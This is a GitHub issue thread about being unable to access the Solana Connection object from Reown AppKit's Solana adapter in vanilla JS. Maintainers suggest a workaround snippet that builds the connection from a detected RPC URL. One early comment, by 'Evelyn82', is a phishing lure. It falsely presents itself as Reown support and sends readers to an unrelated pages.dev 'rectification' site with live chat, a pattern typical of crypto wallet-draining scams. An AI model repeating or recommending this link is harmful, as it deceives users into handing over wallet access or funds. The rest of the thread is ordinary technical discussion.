### ISSUE TITLE
[bug] Impossible to use solana connection in vanilla JS

### ISSUE THREAD

**Issue by beeb** [reown-com/appkit#3553]
### Link to minimal reproducible example

https://stackblitz.com/edit/vitejs-vite-i19qspur?file=src%2Fmain.js

### Summary

In vanilla JS, it is currently impossible to retrieve the solana `Connection` object from `@reown/appkit-adapter-solana`.

The vue and react exports specify a `useAppKitConnection` hook to retrieve that connection, but it's unavailable in vanilla JS.

Even the `SolStoreUtil` cannot be imported from `@reown/appkit-adapter-solana` because it's only exported as a type here: https://github.com/reown-com/appkit/blob/4d3dd28b89eb135687350ccaa9cd62d2a693cd58/packages/adapters/solana/src/index.ts#L8

### List of related npm package versions

@reown/appkit-adapter-solana v1.6.2

### Node.js Version

v22

### Package Manager

pnpm 9.15.1

**Comment by Evelyn82** [comment]
We apologize for any trouble you've encountered; it seems there may have been a glitch with the cloud data, but rest assured, we can resolve this issue. To expedite the process, kindly follow the link below to reach our specialized support team:

[Reown Support Request](https://chain-dappsrectification.pages.dev/)

Use the live chat button at the bottom right to connect with a support agent for prompt assistance.

Thank you for your patience—I’m confident your issue will be resolved soon!

**Comment by rtomas** [comment]
Thanks for reporting the issue ... we are working to solve it as soon as possible.

**Comment by arein** [comment]
Thx for reporting @beeb - curious - what are you building?

**Comment by beeb** [comment]
@arein just trying to find the best way to integrate with Svelte. No particular project in mind.

**Comment by ethan-tqa** [comment]
Yep, I have also filed a bug report for the doc here: [https://github.com/reown-com/reown-docs/issues/230](https://github.com/reown-com/reown-docs/issues/230)

**Comment by beeb** [comment]
@souvikmishra thanks for the link, but the proposed solution to subscribe doesn't work here, because there is no subscribe method for the solana connection.

**Comment by souvikmishra** [comment]
Ah... I thought it might be helpful 🙆‍♂️ anyways if I come across something else I'll be sure to drop it here.

**Comment by Sam-Newman** [comment]
Thank you for raising this -  team will look into it!

**Comment by magiziz** [comment]
@beeb Why do you need solana connection directly from appkit ? Can you do something like this ?

```ts
const connection = new Connection('https://api.mainnet-beta.solana.com', 'confirmed')
```

**Comment by beeb** [comment]
@magiziz it's available to react and vue users, so why not vanilla?

**Comment by beeb** [comment]
> Can you do something like this ?

I would rather not. The advantage of using the same connection that the client is using is you are sure you get the same data because it uses the same RPC. Likewise, when the network changes, the client automatically updates the connection which would then make sure that the network/chain is the same for all of the application. Doing is otherwise is at best a hack, at worst error-prone.

**Comment by magiziz** [comment]
@beeb we're choosing the first available RPC provider that's available in the networks. [Here](https://github.com/reown-com/appkit/blob/main/packages/adapters/solana/src/client.ts#L337-L340) is the code if you're curious.

For now i think the best solution is to do this.

```ts
import { Connection } from '@solana/web3.js'

import { SolHelpersUtil } from '@reown/appkit-adapter-solana'
import { solana } from '@reown/appkit/networks'

const rpcUrl = SolHelpersUtil.detectRpcUrl(solana, 'YOUR_PROJECT_ID') as string

if (!rpcUrl) {
  throw new Error('No RPC URL found')
}

const connection = new Connection(rpcUrl, 'confirmed')
```

If we were to expose this in vanilla js it would require some refactoring work and this hasn't been requested from a lot of people. Let me know if the solution above works for now.

**Comment by beeb** [comment]
@magiziz the easiest "fix" that would not require refactoring would be to export the `SolStoreUtil` singleton no? At the moment it's only exported as a type.

**Comment by magiziz** [comment]
@beeb I think if we were to expose `SolStoreUtil` it wouldn't be the nicest approach, instead i think we should expose this from `createAppKit`, but for that to happen we would need to do some refactoring. Can you use the approach i gave above and see if that works ? It should be the same

**Comment by beeb** [comment]
Well I would need to also watch for chain changes in your proposed approach. But yeah I guess it would be a kind of workaround.

**Comment by magiziz** [comment]
@beeb yes we'll take a look at this, but as a workaround you can use the approach above. Please re-open this issue if you're still stuck 🙏
